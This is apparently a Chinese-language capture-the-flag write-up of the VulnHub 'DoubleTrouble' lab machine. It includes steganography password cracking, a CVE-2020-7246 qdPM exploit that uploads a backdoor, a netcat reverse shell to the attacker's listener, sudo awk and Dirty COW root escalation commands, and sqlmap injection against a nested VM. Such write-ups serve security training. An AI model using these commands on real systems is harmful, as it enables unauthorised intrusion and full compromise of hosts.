VulnHub-DoubleTrouble

前言

  这是打靶训练的第16周,靶机下载,此套靶机非常的特殊,一个靶机中嵌套了一个靶机。难度中。

信息搜集

  nmap只扫到了80、22端口,查看网页。得到一个登录框,cms为qdPM 9.1
  
  进行路径探测,得到secret目录,访问
  
  有一张图片,下载看看
  

隐写术解密

  遇到这种第一时间就应该想到隐写术,使用steghide info doubletrouble.jpg,查看隐写,提示需要密码
  
  接下来使用stegseek进行密码破解,stegseek doubletrouble.jpg rockyou.txt -xf file,使用rockyou.txt字典,将获取到的内容保存为file文件。
  破解出来密码为92camaro
  
  cat file后,得到用户名otisrush@localhost.com,密码otis666
  
  成功登录
  

CVE-2020-7246

  网上搜索了一波qdPM 9.1漏洞,存在CVE-2020-7246,下载完成后,自己改下源码的缩进,它的缩进有问题。
  之后使用python 50175.py -url http://192.168.2.122/ -u otisrush@localhost.com -p otis666,上传了一个后门
  
  访问此链接,可看到后门文件
  
  成功执行whoami
  
  kali监听4444,执行nc -e /bin/bash 192.168.2.116 4444,反弹一个shell
  
  sudo -l,awk存在提权,使用sudo awk 'BEGIN {system("/bin/bash")}',进行提权
  

第二台靶机

  在/root下存在第二台靶机,这里使用nc进行文件传输。kali使用nc -lvp 4444 > second.ova,将文件保存为second.ova。靶机使用nc -vn 192.168.2.116 4444 < doubletrouble.ova -w 1-w 1是文件传输完毕后,1s后断开连接。
  
  为了防止数据在传输过程中被损坏,建议校验一下md5值,此靶机值为186b2cb6b64e630c6e93fb9905e76a0d
  
  安装好后,继续进行端口扫描,得到80,22。打开网页
  

sql注入

  使用sqlmap进行梭哈,发现存在sql注入
  
  获取表名
  
  获取数据
  
  尝试了一番,发现网页上登录不上。回到ssh,继续尝试,最终以clapton ZubZub99登录
  

脏牛提权

  内核为Debian 3.2.78-1 x86_64,使用脏牛提权

git clone git://github.com/FireFart/dirtycow.git
gcc -o dirtycow dirtycow.c -pthread -lcrypt
./dirty 123456

  

查看评论 -
评论